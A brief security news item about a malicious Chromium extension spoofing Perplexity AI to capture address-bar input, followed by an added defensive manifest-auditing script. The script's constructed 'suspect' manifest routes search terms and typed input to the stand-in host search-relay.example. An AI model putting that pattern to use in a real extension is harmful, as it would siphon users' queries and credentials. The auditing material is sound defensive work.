cybersecurity.pk • 2h
Malicious Chromium Extension Spoofing Perplexity AI for Real-Time Data Exfiltration
A malicious Chromium extension masquerading as a Perplexity AI tool leveraged Manifest V3 (MV3) APIs to intercept and log real-time address bar keystrokes before user submission. By implementing a redirection pattern (User → Attacker Intermediary → Legitimate Search Provider), the threat actor captured sensitive queries, PII, and credentials without disrupting the user experience. This human-layer attack highlights a critical governance gap in browser extension auditing, allowing for silent reconnaissance and intellectual property theft within corporate environments via attacker-controlled intermediary infrastructure.
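
An auditing check for the gap described above, added here as an example and not taken from the report or from any vendor tool. It assumes the address-bar capture is declared through the manifest's chrome_settings_overrides search provider or an omnibox keyword (the report does not name the API); the allowlists, the host search-relay.example and both sample manifests are constructed.

```python
import json
from urllib.parse import urlparse

# Constructed allowlists (assumptions): search hosts the organisation accepts,
# and the domain each brand name is expected to resolve to.
TRUSTED_SEARCH_HOSTS = {"perplexity.ai", "google.com", "bing.com", "duckduckgo.com"}
BRAND_HOSTS = {"perplexity": "perplexity.ai"}

def _on_host(url, hosts):
    host = (urlparse(url).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in hosts)

def audit_manifest(manifest, trusted=TRUSTED_SEARCH_HOSTS):
    """Return findings for one parsed extension manifest.json."""
    findings = []
    provider = manifest.get("chrome_settings_overrides", {}).get("search_provider", {})
    # search_url receives submitted queries; suggest_url receives partial
    # input while the user is still typing in the address bar.
    for key in ("search_url", "suggest_url"):
        url = provider.get(key)
        if url and not _on_host(url, trusted):
            findings.append(f"{key} routes address-bar input to {urlparse(url).hostname}")
    if "omnibox" in manifest:
        findings.append("omnibox keyword: extension code sees input as it is typed")
    name = manifest.get("name", "").lower()
    url = provider.get("search_url", "")
    for brand, host in BRAND_HOSTS.items():
        if brand in name and url and not _on_host(url, {host}):
            findings.append(f"name claims '{brand}' but search_url is not on {host}")
    return findings

# Constructed sample: lookalike extension pointing at an intermediary host.
SUSPECT = json.loads("""{
  "manifest_version": 3,
  "name": "Perplexity AI Search",
  "chrome_settings_overrides": {"search_provider": {
    "name": "Perplexity", "keyword": "pplx", "is_default": true,
    "search_url": "https://search-relay.example/q?s={searchTerms}",
    "suggest_url": "https://search-relay.example/s?q={searchTerms}"}}
}""")
# Constructed sample: same branding, search sent directly to the brand's domain.
BENIGN = json.loads("""{
  "manifest_version": 3,
  "name": "Perplexity - AI Search",
  "chrome_settings_overrides": {"search_provider": {
    "name": "Perplexity", "keyword": "pplx", "is_default": true,
    "search_url": "https://www.perplexity.ai/search?q={searchTerms}"}}
}""")

if __name__ == "__main__":
    for finding in audit_manifest(SUSPECT):
        print(finding)
```

A manifest audit only shows where address-bar input is declared to go; a redirect performed by the intermediary server itself is visible only in proxy or DNS logs.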